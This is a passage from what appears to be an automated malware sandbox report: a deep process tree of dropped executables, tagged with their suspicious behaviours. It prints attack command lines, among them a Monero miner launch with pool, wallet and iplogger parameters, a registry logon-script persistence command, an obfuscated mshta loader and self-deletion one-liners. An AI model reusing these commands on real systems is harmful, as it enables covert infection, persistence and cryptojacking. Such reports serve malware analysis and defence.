                                                                          "C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3712
                                                                          • C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe
                                                                            C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4712
                                                                        • C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe
                                                                          "C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:688
                                                                          • C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe
                                                                            C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4704
                                                                        • C:\Users\Admin\Documents\_bBir4fW40ZAieqy4xVVVqdZ.exe
                                                                          "C:\Users\Admin\Documents\_bBir4fW40ZAieqy4xVVVqdZ.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2808
                                                                          • C:\Users\Admin\AppData\Roaming\1024372.exe
                                                                            "C:\Users\Admin\AppData\Roaming\1024372.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4788
                                                                          • C:\Users\Admin\AppData\Roaming\8222320.exe
                                                                            "C:\Users\Admin\AppData\Roaming\8222320.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:3144
                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:2748
                                                                          • C:\Users\Admin\AppData\Roaming\8195904.exe
                                                                            "C:\Users\Admin\AppData\Roaming\8195904.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4744
                                                                          • C:\Users\Admin\AppData\Roaming\6774205.exe
                                                                            "C:\Users\Admin\AppData\Roaming\6774205.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5192
                                                                        • C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe
                                                                          "C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3832
                                                                          • C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe
                                                                            "C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1584
                                                                        • C:\Users\Admin\Documents\r7KWMen_6LYljFTXNU21pyHC.exe
                                                                          "C:\Users\Admin\Documents\r7KWMen_6LYljFTXNU21pyHC.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:1360
                                                                        • C:\Users\Admin\Documents\EVawsdwdyWR8sahgToN8uJ5E.exe
                                                                          "C:\Users\Admin\Documents\EVawsdwdyWR8sahgToN8uJ5E.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:908
                                                                        • C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe
                                                                          "C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:4056
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CPSIK.tmp\j6dICuruH5OX6Xd08n6Q5qCn.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CPSIK.tmp\j6dICuruH5OX6Xd08n6Q5qCn.tmp" /SL5="$201FA,138429,56832,C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:4140
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-60525.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-60525.tmp\Setup.exe" /Verysilent
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:5052
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:6044
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-U6S6Q.tmp\Stats.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-U6S6Q.tmp\Stats.tmp" /SL5="$10378,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:4536
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-43O8M.tmp\builder.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-43O8M.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                    7⤵
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:6856
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                5⤵
                                                                                  PID:6084
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 772
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:6824
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 744
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:6776
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Enumerates connected drives
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5152
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                    6⤵
                                                                                      PID:1160
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                    5⤵
                                                                                      PID:572
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-B7Q28.tmp\WEATHER Manager.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-B7Q28.tmp\WEATHER Manager.tmp" /SL5="$10396,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:5616
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          • Enumerates connected drives
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:6744
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                            8⤵
                                                                                              PID:8048
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                        5⤵
                                                                                          PID:6128
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MT152.tmp\Inlog.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MT152.tmp\Inlog.tmp" /SL5="$1037C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:5296
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                              7⤵
                                                                                              • Loads dropped DLL
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5592
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-64GDD.tmp\Setup.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-64GDD.tmp\Setup.tmp" /SL5="$104D4,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops startup file
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:4640
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                  9⤵
                                                                                                    PID:5528
                                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                      10⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:6352
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                    9⤵
                                                                                                      PID:9380
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        10⤵
                                                                                                          PID:10108
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                          10⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:9812
                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                        9⤵
                                                                                                          PID:68
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler"
                                                                                                          9⤵
                                                                                                            PID:4696
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler.exe"
                                                                                                              10⤵
                                                                                                                PID:10564
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping localhost -n 4
                                                                                                                  11⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:10676
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                              9⤵
                                                                                                              • Checks computer location settings
                                                                                                              PID:9144
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5244
                                                                                                      • C:\Users\Admin\AppData\Roaming\4186711.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\4186711.exe"
                                                                                                        6⤵
                                                                                                          PID:6720
                                                                                                        • C:\Users\Admin\AppData\Roaming\3855574.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\3855574.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                          PID:6768
                                                                                                        • C:\Users\Admin\AppData\Roaming\8427271.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\8427271.exe"
                                                                                                          6⤵
                                                                                                            PID:1512
                                                                                                          • C:\Users\Admin\AppData\Roaming\2407460.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\2407460.exe"
                                                                                                            6⤵
                                                                                                              PID:4380
                                                                                                            • C:\Users\Admin\AppData\Roaming\5835763.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\5835763.exe"
                                                                                                              6⤵
                                                                                                                PID:6848
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              PID:5512
                                                                                                              • C:\Users\Admin\Documents\fGo2SwgVDQo0h419nKTWto4E.exe
                                                                                                                "C:\Users\Admin\Documents\fGo2SwgVDQo0h419nKTWto4E.exe"
                                                                                                                6⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:7088
                                                                                                              • C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe
                                                                                                                "C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe"
                                                                                                                6⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:6132
                                                                                                                • C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe
                                                                                                                  C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe
                                                                                                                  7⤵
                                                                                                                    PID:6948
                                                                                                                  • C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe
                                                                                                                    C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe
                                                                                                                    7⤵
                                                                                                                      PID:7228
                                                                                                                  • C:\Users\Admin\Documents\p8f80fEi4lip7uaO8ZYj3Mwf.exe
                                                                                                                    "C:\Users\Admin\Documents\p8f80fEi4lip7uaO8ZYj3Mwf.exe"
                                                                                                                    6⤵
                                                                                                                      PID:5464
                                                                                                                    • C:\Users\Admin\Documents\jyGoXTSknssMRF52BzVwSycd.exe
                                                                                                                      "C:\Users\Admin\Documents\jyGoXTSknssMRF52BzVwSycd.exe"
                                                                                                                      6⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7148
                                                                                                                    • C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe
                                                                                                                      "C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"
                                                                                                                      6⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:6696
                                                                                                                      • C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe
                                                                                                                        "C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"
                                                                                                                        7⤵
                                                                                                                          PID:7928
                                                                                                                      • C:\Users\Admin\Documents\AOKTMuiL4n2OPtUgKhVYTT6A.exe
                                                                                                                        "C:\Users\Admin\Documents\AOKTMuiL4n2OPtUgKhVYTT6A.exe"
                                                                                                                        6⤵
                                                                                                                          PID:1832
                                                                                                                        • C:\Users\Admin\Documents\V6XNNdcDwuQpDVchLbXwr7vc.exe
                                                                                                                          "C:\Users\Admin\Documents\V6XNNdcDwuQpDVchLbXwr7vc.exe"
                                                                                                                          6⤵
                                                                                                                            PID:4884
                                                                                                                          • C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe
                                                                                                                            "C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"
                                                                                                                            6⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:1232
                                                                                                                            • C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe
                                                                                                                              "C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"
                                                                                                                              7⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:7400
                                                                                                                          • C:\Users\Admin\Documents\zArUN9hOnHgjUb5JXv3UV9dL.exe
                                                                                                                            "C:\Users\Admin\Documents\zArUN9hOnHgjUb5JXv3UV9dL.exe"
                                                                                                                            6⤵
                                                                                                                              PID:736
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 480
                                                                                                                                7⤵
                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                • Program crash
                                                                                                                                PID:6636
                                                                                                                            • C:\Users\Admin\Documents\hSuVUnsWY7mz347tCpvO6Hm7.exe
                                                                                                                              "C:\Users\Admin\Documents\hSuVUnsWY7mz347tCpvO6Hm7.exe"
                                                                                                                              6⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:7084
                                                                                                                            • C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe
                                                                                                                              "C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe"
                                                                                                                              6⤵
                                                                                                                                PID:6156
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "oqpkkhRVfV5mzpQDPuUUjBc7.exe" /f & erase "C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe" & exit
                                                                                                                                  7⤵
                                                                                                                                    PID:4236
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im "oqpkkhRVfV5mzpQDPuUUjBc7.exe" /f
                                                                                                                                      8⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:1040
                                                                                                                                • C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe
                                                                                                                                  "C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:1036
                                                                                                                                    • C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe
                                                                                                                                      "C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe" -q
                                                                                                                                      7⤵
                                                                                                                                        PID:6508
                                                                                                                                    • C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe
                                                                                                                                      "C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:1600
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                          7⤵
                                                                                                                                            PID:7260
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                              8⤵
                                                                                                                                                PID:9132
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill -IM "xEatncuF4o0u8h9n1YArmkEa.exe" -f
                                                                                                                                                  9⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:7528
                                                                                                                                          • C:\Users\Admin\Documents\zuP28SItP5DxU9zGKol54g1U.exe
                                                                                                                                            "C:\Users\Admin\Documents\zuP28SItP5DxU9zGKol54g1U.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:4792
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 388
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:7432
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 416
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:7692
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 456
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5828
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 624
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5380
                                                                                                                                            • C:\Users\Admin\Documents\6Mj55rQqMBIzkP38H2LXBBOA.exe
                                                                                                                                              "C:\Users\Admin\Documents\6Mj55rQqMBIzkP38H2LXBBOA.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:5508
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 660
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:724
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 664
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:7436
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 632
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:7680
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 680
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:7896
                                                                                                                                              • C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe
                                                                                                                                                "C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:2936
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "TBy7CdM0udeAquD40u2SNKIL.exe" /f & erase "C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe" & exit
                                                                                                                                                    7⤵
                                                                                                                                                      PID:8816
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /im "TBy7CdM0udeAquD40u2SNKIL.exe" /f
                                                                                                                                                        8⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:8992
                                                                                                                                                  • C:\Users\Admin\Documents\mpQxRx5lFyQXTsX6xCBivFPL.exe
                                                                                                                                                    "C:\Users\Admin\Documents\mpQxRx5lFyQXTsX6xCBivFPL.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2920
                                                                                                                                                    • C:\Users\Admin\Documents\TN63QwOcdajBxzLBcsRLhJMC.exe
                                                                                                                                                      "C:\Users\Admin\Documents\TN63QwOcdajBxzLBcsRLhJMC.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2848
                                                                                                                                                      • C:\Users\Admin\Documents\ZFsgv3ebJ4tVSQycSj7b1ZVv.exe
                                                                                                                                                        "C:\Users\Admin\Documents\ZFsgv3ebJ4tVSQycSj7b1ZVv.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:5688
                                                                                                                                                      • C:\Users\Admin\Documents\uPRmADkV8NoeUbejA2tfPDg_.exe
                                                                                                                                                        "C:\Users\Admin\Documents\uPRmADkV8NoeUbejA2tfPDg_.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5044
                                                                                                                                                      • C:\Users\Admin\Documents\6Oj4iZrHyE2AXuMcCn23_GJa.exe
                                                                                                                                                        "C:\Users\Admin\Documents\6Oj4iZrHyE2AXuMcCn23_GJa.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:3556
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7060684.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7060684.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6504
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4349180.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4349180.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                              PID:7208
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6329368.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6329368.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5048
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5605311.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5605311.exe"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3320
